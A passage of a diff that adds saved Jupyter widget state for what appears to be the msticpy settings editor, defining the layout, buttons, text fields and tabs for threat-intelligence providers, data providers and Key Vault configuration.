+       "layout": "IPY_MODEL_c99f098a06e146648ccd17d7b1647cef"
+      }
+     },
+     "abe77675129540e396fa8c3fdfe94369": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "ac10964e194b41ce880cd681be6e7bd8": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_113d408f292444b798803a700233e6c3",
+        "IPY_MODEL_63041ab5d58546568f57d0f3ff750c43"
+       ],
+       "layout": "IPY_MODEL_8199433b842b4acab63b6be747ea68a6"
+      }
+     },
+     "acfa430b45944781905f52df22d98599": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "acfbd0b65c154815aa1298359b585f00": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "300px",
+       "width": "99%"
+      }
+     },
+     "ada9c7d5022645a2b3358762d9da817a": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_ed791ac19fcc479ba70c43189aadc709",
+        "IPY_MODEL_950b913e838f4f89b19011c6d03a2c6c"
+       ],
+       "layout": "IPY_MODEL_76ce889dfeb948bf86d143ea64785b0e"
+      }
+     },
+     "adc601ccd4994d6b9b1aafc928a6ede5": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "100px"
+      }
+     },
+     "ae0e28b48b1f419a9c9d1099b9554277": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Validate Settings",
+       "layout": "IPY_MODEL_7b32d76ea7a9413b84f9f8813692cf0e",
+       "style": "IPY_MODEL_66ba75228df14e3fa9613bc3b7f12f42"
+      }
+     },
+     "ae24925fcba640a8999fe91276eb0065": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "ae98dfc6478e4914807b44f55f56ec47": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "aec0752390d24288a850f376c77e904f": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "99%"
+      }
+     },
+     "aedf0a95406b4e6db2cddbea4438d7ff": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_c23b918c20df496e92ad80b18ac42184",
+        "IPY_MODEL_ac10964e194b41ce880cd681be6e7bd8",
+        "IPY_MODEL_7b349f868be24ba296f1a979484050a4",
+        "IPY_MODEL_787e319c9e4f49d1ab41b5dab06e0958"
+       ],
+       "layout": "IPY_MODEL_138d7cd9b7f44aa7bdffa09d716075fb"
+      }
+     },
+     "af4b40a1300f441581b3ae2e0fd9a71a": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "af5ce13a708a4ba89fa0c0232c84e9b1": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_bca3bab5da3543cc846ff24a5a2b05c4",
+        "IPY_MODEL_d144650a5e454925be55c202d4a911cb",
+        "IPY_MODEL_1b95eacfdf7e4beabc752b058a2ee210"
+       ],
+       "layout": "IPY_MODEL_bb568350b39042b2a4446832347a3a04"
+      }
+     },
+     "b04fb2978a934795b8eaf349c1ed8b7b": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "100px"
+      }
+     },
+     "b0c98cf042ed4835bb99cee762cc090d": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "b0e64443606440cfbea552abe06f8366": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "b1a30702491041c99764946d0af98256": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "b21867bc82504992bc515320bbc58b37": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "300px",
+       "width": "99%"
+      }
+     },
+     "b268967eeffd416fb0668898ec3d32aa": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "99%"
+      }
+     },
+     "b27c23970ed84b0fa24845bf9ef222bf": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "b2a03f51c8aa458fa12d574aae3f1e0d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "VaultName",
+       "layout": "IPY_MODEL_307293a98db44c97848b363bc6f39f99",
+       "style": "IPY_MODEL_adc601ccd4994d6b9b1aafc928a6ede5",
+       "value": "mstic-ianhelle"
+      }
+     },
+     "b3c418ad172c458eb801acead118dda5": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "b3f87df3253e450facc04e76a86b8ebf": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Add",
+       "layout": "IPY_MODEL_03bb844dadea436e86b4d3fb95277aeb",
+       "style": "IPY_MODEL_d8d9dc6bfa014726b51592ce7f6c6981"
+      }
+     },
+     "b42f7980215a4d66a1f1e5dac33bdf63": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Upload to KV",
+       "layout": "IPY_MODEL_1c9e7eaa28a44828bed8e0f318b7d95f",
+       "style": "IPY_MODEL_ae98dfc6478e4914807b44f55f56ec47"
+      }
+     },
+     "b43048186b9e4f38a4bfd837408aa9f7": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "b4f9994e17864f7995bdc8df7adf03ba": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "99%"
+      }
+     },
+     "b56ea10a7a40481298ebdf0dbe81eb2c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "b59bbbcd14914053b3a025463c2970fc": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HTMLModel",
+      "state": {
+       "layout": "IPY_MODEL_2be6942018f04602b788fe74ef9c0be9",
+       "style": "IPY_MODEL_c1f4670da19c4b609b05922c62fb2fef",
+       "value": "\n    Supply the parameters for your Key Vault here to store secret\n    values such as API Keys.<br>\n\n    Check \"UseKeyring\" if you have Keyring installed and want to be\n    able to cache the secrets locally.<br>\n\n    The first five items are mandatory. If you are not using a regional\n    or private cloud the value for \"Authority\" should be global.\n    <br><a href='https://msticpy.readthedocs.io/en/latest/getting_started/msticpyconfig.html#specifying-secrets-as-key-vault-secrets' target='_blank' style='color: blue; text-decoration: underline;'>Online: Key Vault Settings</a>"
+      }
+     },
+     "b5bfd3fef1804a2fb6744e605743a34f": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "b5c8ae06e9034d888d7f85ffe8badb8f": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_5ca6857a0a9a4df197de7e29ffcf2d2c",
+        "IPY_MODEL_562192e69954470cb98543216489a4af"
+       ],
+       "layout": "IPY_MODEL_fb46133b44af456595e4392e3da0c4a2"
+      }
+     },
+     "b5c946e00c254198bd9941fa3fa975da": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "Provider",
+       "disabled": true,
+       "layout": "IPY_MODEL_ea7f96341540490a99ad5d1794972619",
+       "style": "IPY_MODEL_0a5f86e9c17e4643b420593ef3845cbf",
+       "value": "OTX"
+      }
+     },
+     "b63b9e5c01b345fcb356ca9e1476a7b6": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_af4b40a1300f441581b3ae2e0fd9a71a",
+       "style": "IPY_MODEL_a4f692ed58c046c8b5c095b681430a08",
+       "value": "Settings for Data Providers"
+      }
+     },
+     "b6510414c0074137bf1a1c087b247245": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "b65cf1c78ac94418ad231cec3a950aa3": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectModel",
+      "state": {
+       "description": "Providers",
+       "index": null,
+       "layout": "IPY_MODEL_535aa7be330448fca1e52a4a09538928",
+       "style": "IPY_MODEL_106a0acdebf3431ba9f220188d2026e1"
+      }
+     },
+     "b69c00bf4b9440359f2cf6952ad4df21": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Close",
+       "layout": "IPY_MODEL_2562193d1b3d46949b5fa0a29a3f1bef",
+       "style": "IPY_MODEL_8fe8964dd213404791163a6a85c90dd6"
+      }
+     },
+     "b81f214619184e048eb3f1449936c571": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "b846ad25b11b43d7bc7eb1348effa55f": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Validate Settings",
+       "layout": "IPY_MODEL_9ae51a287b924f3db1c8e846bee3dac5",
+       "style": "IPY_MODEL_6af4f0fef2fc4c21b38d02e6773ca11c"
+      }
+     },
+     "b8df26df8fe64a19914d03f7fdda39b9": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "b90a583dd72d4fa2979eea84ba588ba5": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Select File",
+       "layout": "IPY_MODEL_03716e936e62472385944deca31916d5",
+       "style": "IPY_MODEL_fd10f543f5f24842832e0a99cdc18a7f"
+      }
+     },
+     "b920c2d4fc7d418289beea3b23173e6b": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "98%"
+      }
+     },
+     "b9763ac8782e4074ba24125602c3cbc2": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "50%"
+      }
+     },
+     "b9dbd3d5a2df4e2b886a0bce483aee1a": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Close",
+       "layout": "IPY_MODEL_dd762cde710240ca9f7ce506655bdaae",
+       "style": "IPY_MODEL_6f1ccaaf9e434fec84ab4cf2b2031bef"
+      }
+     },
+     "ba198c331f1f457981d067c106c32026": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "Value of MSTICPCONFIG",
+       "disabled": true,
+       "layout": "IPY_MODEL_2b8456d0ff9245619e0c5c41e337264e",
+       "style": "IPY_MODEL_8422aeaba9bf4ace8c73d8ea036aabfc",
+       "value": "e:\\src\\microsoft\\msticpyconfig.yaml"
+      }
+     },
+     "bb568350b39042b2a4446832347a3a04": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "40%"
+      }
+     },
+     "bc24f4f4dddf4e9db6ad2f69fdeb9357": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "bc808a3916ee49b395f94ac8ef7f614b": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_8600f46f68874fa7a7364a7f692b8919",
+       "style": "IPY_MODEL_bf546c55b1fe4bc3be644cfb25cc7ffc",
+       "value": "Search for file in current path"
+      }
+     },
+     "bca3bab5da3543cc846ff24a5a2b05c4": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectModel",
+      "state": {
+       "description": "Providers",
+       "index": null,
+       "layout": "IPY_MODEL_535aa7be330448fca1e52a4a09538928",
+       "style": "IPY_MODEL_154998f70684455ab9e11390a28f76a9"
+      }
+     },
+     "bcd23f4d1176463e81b64c428861eedc": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "bd31f21d00d24f0792fdc92f6006cb97": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "continuous_update": false,
+       "description": "Search pattern",
+       "layout": "IPY_MODEL_b9763ac8782e4074ba24125602c3cbc2",
+       "style": "IPY_MODEL_a30f910d7a8a4432afc5bc62b6f05d47"
+      }
+     },
+     "bd6809ed6e454c89bf358ba29eda9837": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "AccordionModel",
+      "state": {
+       "_titles": {
+        "0": "Search"
+       },
+       "children": [
+        "IPY_MODEL_43df6fca430a47789958843a70dc94df"
+       ],
+       "layout": "IPY_MODEL_b5bfd3fef1804a2fb6744e605743a34f",
+       "selected_index": null
+      }
+     },
+     "bdc5fe7e1d234a5a8c5fa2c1a7f232e3": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "be40b457654848108782eda0a6277486": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "200px",
+       "width": "45%"
+      }
+     },
+     "be78282b40d241a1a67caccad2c6457c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "bee18ca76800436ab6eefe00a03164db": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_e0cdf461489b4dd78d1a8074497f3abd",
+        "IPY_MODEL_52dc0cd425cf407eb7f1928ee8fb4d93",
+        "IPY_MODEL_ff53599855a04f2083ee7bb547db1e74",
+        "IPY_MODEL_9b4ca2e2ddcf4125b0c6aba273edfd01",
+        "IPY_MODEL_b2a03f51c8aa458fa12d574aae3f1e0d",
+        "IPY_MODEL_2d62568d9de84032bfe75fb9c57c1616",
+        "IPY_MODEL_c7c6cedaddfd4c1780dde5f7fa79dc02"
+       ],
+       "layout": "IPY_MODEL_e74003f6e2604c9580bf148b31317484"
+      }
+     },
+     "bf546c55b1fe4bc3be644cfb25cc7ffc": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "c0600f94c39d4ed5a1802acfe20b00fb": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_a207639dee0a47efa60f644c03319db9",
+        "IPY_MODEL_e9f3df2b63fd44acb6c1bc35cd2c2b03"
+       ],
+       "layout": "IPY_MODEL_f324995d185a4f1ebcd75c08a53474c9"
+      }
+     },
+     "c0639f9169c9418f8d243b510f785478": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_ef662708cb7443749144dc336632be9e",
+        "IPY_MODEL_d00aec55e8ab48bcbbf5148e6bf9c4ea",
+        "IPY_MODEL_4f0605db3a1844e08977801bf5f28889"
+       ],
+       "layout": "IPY_MODEL_c5cbdee82e8e413f8ebed05b21603f67"
+      }
+     },
+     "c0aec88e08f14ed7a0bff776489c93fd": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Load file",
+       "layout": "IPY_MODEL_7b32d76ea7a9413b84f9f8813692cf0e",
+       "style": "IPY_MODEL_c0b6d5a52c4c426384c403e198f68e26"
+      }
+     },
+     "c0b6d5a52c4c426384c403e198f68e26": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "c199966467e64d68845bcd4f6757fa23": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "98%"
+      }
+     },
+     "c1e16a6be6c14fa3bc4b9fbfb2aee6c4": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "c1f4670da19c4b609b05922c62fb2fef": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "c23b918c20df496e92ad80b18ac42184": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "continuous_update": false,
+       "description": "Path",
+       "layout": "IPY_MODEL_5c58dcb1f7534f6da17b309bd54c18f3",
+       "style": "IPY_MODEL_b27c23970ed84b0fa24845bf9ef222bf",
+       "value": "E:\\src\\microsoft\\msticpy\\docs\\notebooks"
+      }
+     },
+     "c3eada2a8e8e4685835224b6156557b8": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Delete",
+       "layout": "IPY_MODEL_03bb844dadea436e86b4d3fb95277aeb",
+       "style": "IPY_MODEL_d934834d337f41689a2c190ff5dd5b0a"
+      }
+     },
+     "c3fbbc8d8d7b4946b7f40561606c0ffd": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "c4f06bdb5e82401ab36e9536194c8335": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_3b6bcc00b5ec4f0c9de3dfc8fe2b55b3",
+        "IPY_MODEL_011392be57434de68602516c5b0e639d",
+        "IPY_MODEL_9b28f089810d4ae788d99b9023888c49"
+       ],
+       "layout": "IPY_MODEL_494be31585354bd6b62b73c7e92b41cf"
+      }
+     },
+     "c54b4bbacd7f42acb58423f0504c5366": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "35%"
+      }
+     },
+     "c555f41a9d41473ba86e555fd0541222": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "AccordionModel",
+      "state": {
+       "_titles": {
+        "0": "Help"
+       },
+       "children": [
+        "IPY_MODEL_f63b51d320a044af86f45d8120a0289d"
+       ],
+       "layout": "IPY_MODEL_1a86555b95c54880bf421fbcd3994b8b",
+       "selected_index": null
+      }
+     },
+     "c5cbdee82e8e413f8ebed05b21603f67": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "c66266a337754982a41467da14df341b": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "c7c6cedaddfd4c1780dde5f7fa79dc02": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectModel",
+      "state": {
+       "_options_labels": [
+        "global",
+        "usgov",
+        "de",
+        "chi"
+       ],
+       "description": "Authority",
+       "index": 0,
+       "layout": "IPY_MODEL_307293a98db44c97848b363bc6f39f99",
+       "style": "IPY_MODEL_261225eae1f242729a5de8700cba9bb3"
+      }
+     },
+     "c824c259b685424795e8b097a913675e": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "c86c3e7bc5e84a048f595ac44a26a507": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "TenantId",
+       "layout": "IPY_MODEL_1f2f704c99c14428a081a7d241746a6f",
+       "style": "IPY_MODEL_1eada7df6d564c40a8f78295b893c45e",
+       "value": "72f988bf-86f1-41af-91ab-2d7cd011db47"
+      }
+     },
+     "c87c175f76ec49d1b7443a8224c2f24a": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Load file",
+       "layout": "IPY_MODEL_9ae51a287b924f3db1c8e846bee3dac5",
+       "style": "IPY_MODEL_910364bd0dcc46968c41d243711a58a1"
+      }
+     },
+     "c8af8d2f7c5a4fcd9ef7270b7112a301": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_048a2fff59c24ba1894f6d71d8071f65",
+        "IPY_MODEL_f9a76daeec5b460e8594c2ecff0542d1",
+        "IPY_MODEL_36bb561ad3b643f68b4912a64143adf1"
+       ],
+       "layout": "IPY_MODEL_b81f214619184e048eb3f1449936c571"
+      }
+     },
+     "c99b28c8227d496e91e5d04fa3bcbec7": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "c99f098a06e146648ccd17d7b1647cef": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "99%"
+      }
+     },
+     "ca6d9ef594db4917b223d93e54e9aed7": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Add",
+       "layout": "IPY_MODEL_1f39abd684a54ef9ac5d923248b498fe",
+       "style": "IPY_MODEL_22015fc451994232ad4faa1a60933927"
+      }
+     },
+     "ca9c2a191d8c4700883ae6bf6d10c190": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "cac586c1b7ec4851aa7899d907a0ba19": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "99%"
+      }
+     },
+     "cacc86330c2f49c890e594fa673eb320": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TabModel",
+      "state": {
+       "_titles": {
+        "0": "AzureSentinel",
+        "1": "TI Providers",
+        "2": "Data Providers",
+        "3": "GeoIP Providers",
+        "4": "Key Vault",
+        "5": "Autoload QueryProvs",
+        "6": "Autoload Components"
+       },
+       "children": [
+        "IPY_MODEL_f464498bf03d4aeda263af1d4a744b2e",
+        "IPY_MODEL_1d00425e93a7419aa677477fdb46dde4",
+        "IPY_MODEL_878f8b44db2149f4967ea48fb21cca5d",
+        "IPY_MODEL_a864a1a45e9340c5b4614c18b8f15fa7",
+        "IPY_MODEL_e19f27308e57458a9650c825151e2462",
+        "IPY_MODEL_137f07f8109e4572b8c858a6a94abf2f",
+        "IPY_MODEL_0e4bfc4edcbc4ead81d3fd3597ab77e3"
+       ],
+       "layout": "IPY_MODEL_9a0377ea682c4201aaa60ed690b59291"
+      }
+     },
+     "cb4f058bec364c14a31886a9edbb7410": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "layout": "IPY_MODEL_09475999910f4fdea19a20b04901cb30"
+      }
+     },
+     "cb986ba4cc594e7aa20472c53e062efe": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DropdownModel",
+      "state": {
+       "_options_labels": [
+        "GeoIPLite",
+        "IPStack"
+       ],
+       "description": "Add prov",
+       "index": 0,
+       "layout": "IPY_MODEL_e0431ced41944768943a4c066578efa2",
+       "style": "IPY_MODEL_9fb429d5678545e2b5eaaebe450ace9b"
+      }
+     },
+     "cd39d145af58466da692a03069e12af2": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_3064486c0abc4c6b9d1e74076ac529cb",
+        "IPY_MODEL_c0600f94c39d4ed5a1802acfe20b00fb",
+        "IPY_MODEL_035f7da3f6b2462cb5a82f5da10d18cb"
+       ],
+       "layout": "IPY_MODEL_cac586c1b7ec4851aa7899d907a0ba19"
+      }
+     },
+     "cddd3304f9ab49b58af08252ffc39c0b": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "150px"
+      }
+     },
+     "ce12e11dc6164f5cae7fd85c504de8c3": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "ce815b30937d4710a15f8eeb7336f6fa": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "150px"
+      }
+     },
+     "ce96e0b83aa74cd8b07e3bd2d8e23f72": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "150px"
+      }
+     },
+     "cede4b1270ba43e79da91ccdd62777df": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "cf10662541954e1293a3288c7caed409": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "d00aec55e8ab48bcbbf5148e6bf9c4ea": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Delete",
+       "layout": "IPY_MODEL_6ea20439d77e4e6199861f8ec14ede0c",
+       "style": "IPY_MODEL_f8d1e11d60ab48d190c4fcec7eeabbcf"
+      }
+     },
+     "d13c06b32f144724a1a12a1b493c03ed": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "d144650a5e454925be55c202d4a911cb": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_ca6d9ef594db4917b223d93e54e9aed7",
+        "IPY_MODEL_0d9880fa9fea44428db6274aa690d1f1"
+       ],
+       "layout": "IPY_MODEL_4c96f31d9cf2403e857982b6a1b1bdb3"
+      }
+     },
+     "d1d9b25888dd4be78a4e89cea603fbf0": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
